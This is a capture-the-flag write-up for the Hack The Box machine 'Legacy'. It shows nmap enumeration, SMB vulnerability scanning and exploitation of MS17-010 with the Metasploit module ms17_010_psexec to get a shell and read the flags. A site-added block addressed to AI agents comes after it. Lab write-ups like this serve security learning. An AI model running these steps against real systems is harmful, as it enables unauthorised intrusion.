# Legacy

![info-card](/files/-M0-wL-D74SJ1UAjlN7W)

## Initial Enumeration

Like any other target, we'll start off with a quick port scan to see what we're working with:

```bash
nmap -sV 10.10.10.4
```

![Initial Nmap Scan](/files/-M0-wL-F4VFAUuXGBpKT)

Looking at this output it's safe to say SMB is the target here. Let's take a closer look at this service using some NSE scripts:

```bash
nmap -p 139,445 --script=smb-vuln* 10.10.10.4
```

![SMB Vulnerability Scan](/files/-M0-wL-HABELXCNfBm0J)

Bingo, now we just have to find ourselves an exploit. In the interest of time, we'll just use metasploit to exploit this vulnerability. I originally intended to show how to do this manually, but due to the older version of windows this box is running, I ran into a lot of issues. for a non-metasploit look at MS17-010 be sure to take a look at my write-up on [blue](https://wiki.jacobshodd.com/writeups/hack-the-box/blue). The first thing we'll do is start our `msfconsole` and validate that this exploit will work on this target:

```
# starting msfconsole
msfconsole

# the following happens inside the console:
use exploit/windows/smb/ms17_010_psexec 
set RHOST 10.10.10.4
check
```

![MSF Exploit Validation](/files/-M0-wL-JoBFKRZFcOlMs)

## Exploitation

Exploitation from here on is pretty simple. So simple in fact that it just takes typing one word: `exploit`. While I really prefer to not use metasploit for learning purposes, I can't deny how convenient it makes common exploits like this:

![Executing the exploit](/files/-M0-wL-LzP5VmJerPwRY)

With this we can either grab the flags using meterpreter commands, or spawn a shell with the command `shell`. With this we are able to read the flags:

![Flags](/files/-M0-wL-NdD-4FjGNaBi6)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.jacobshodd.com/writeups/hack-the-box/legacy.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.